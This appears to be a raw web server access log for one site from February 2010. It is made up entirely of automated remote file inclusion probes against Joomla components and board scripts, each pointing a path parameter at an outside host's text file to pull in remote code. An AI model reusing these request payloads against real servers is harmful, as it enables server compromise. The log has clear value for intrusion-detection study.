210.205.6.233 - - [13/Feb/2010:09:13:48 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:13:48 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:13:51 -0800] "GET /logs/access_100129.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:13:54 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:14:01 -0800] "GET /components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:14:01 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:14:01 -0800] "GET /logs//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:14:11 -0800] "GET /components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:14:11 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:14:11 -0800] "GET /logs//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:14:14 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:14:14 -0800] "GET /logs/access_100127.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:14:14 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:15:09 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:15:12 -0800] "GET /logs/access_100129.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:15:48 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:15:48 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:15:48 -0800] "GET /logs/access_100127.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:16:19 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:16:57 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.aslcaserta2.it//idste.txt???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:18:00 -0800] "GET /logs/access_100123.log%20%20//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:18:09 -0800] "GET /logs/access_100123.log%20%20//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:18:52 -0800] "GET /logs/access_100123.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:09:18:58 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:18:59 -0800] "GET /logs/access_100123.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:19:00 -0800] "GET /logs/access_100118.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:19:02 -0800] "GET /logs/access_100123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:19:04 -0800] "GET /logs/access_100118.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:19:04 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:19:06 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:19:09 -0800] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:19:15 -0800] "GET /logs/access_100123.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:19:15 -0800] "GET /logs/access_100118.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:19:35 -0800] "GET /logs/access_100123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:19:40 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:20:00 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:20:17 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:21:02 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:21:06 -0800] "GET /logs/access_100131.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:21:06 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:21:06 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:21:09 -0800] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:21:09 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:21:09 -0800] "GET /logs/access_100131.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:21:10 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:21:16 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:21:22 -0800] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:21:30 -0800] "GET /logs/access_100207.log//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:21:32 -0800] "GET /logs/access_100123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:21:33 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:09:21:36 -0800] "GET /logs/access_100103.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:09:21:36 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:09:21:36 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:21:37 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [13/Feb/2010:09:21:37 -0800] "GET /logs///bbs//write_update.php?board_skin_path=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [13/Feb/2010:09:21:37 -0800] "GET /logs/access.log///bbs//write_update.php?board_skin_path=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [13/Feb/2010:09:21:37 -0800] "GET //bbs//write_update.php?board_skin_path=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:21:39 -0800] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:21:44 -0800] "GET /logs/access_100123.log//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:09:21:48 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [13/Feb/2010:09:21:52 -0800] "GET /logs/access_100119.log///bbs//write_update.php?board_skin_path=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:22:12 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:22:12 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:22:12 -0800] "GET /logs/access_100103.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:22:15 -0800] "GET /logs/access_100123.log//components/com_thopper/inc/config_thoper.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:09:22:23 -0800] "GET /delete.php?board_skin_path=http://www.e-kalamaria.gr/panodimousm.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:22:28 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:22:45 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:22:45 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:09:22:55 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:09:22:55 -0800] "GET /logs/access_100103.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:09:22:55 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:22:59 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:22:59 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:22:59 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:09:23:01 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:09:23:04 -0800] "GET /logs/access_100117.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:23:05 -0800] "GET /logs/access_100114.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:23:05 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:23:05 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:14 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:14 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:14 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:16 -0800] "GET /logs/access_100122.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:47 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:47 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:47 -0800] "GET /logs/access_100122.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:47 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:49 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:49 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:09:23:49 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:23:55 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:23:55 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:23:55 -0800] "GET /logs/access_100109.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:24:02 -0800] "GET /logs/access_100123.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:24:08 -0800] "GET /logs/access_100118.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:24:20 -0800] "GET /logs/access_100123.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:24:24 -0800] "GET /logs/access_100112.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:24:28 -0800] "GET /logs/access_100118.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:09:24:32 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:09:24:32 -0800] "GET /delete_all.php?board_skin_path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:09:24:33 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:24:41 -0800] "GET /logs/access_100114.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:24:42 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:24:42 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:24:43 -0800] "GET /logs/access_100119.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:09:24:45 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:25:03 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:25:03 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:25:03 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:25:04 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:25:04 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:25:04 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:25:48 -0800] "GET /logs/access_100123.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:25:56 -0800] "GET /logs/access_100118.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:26:08 -0800] "GET /logs/access_100119.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:26:29 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
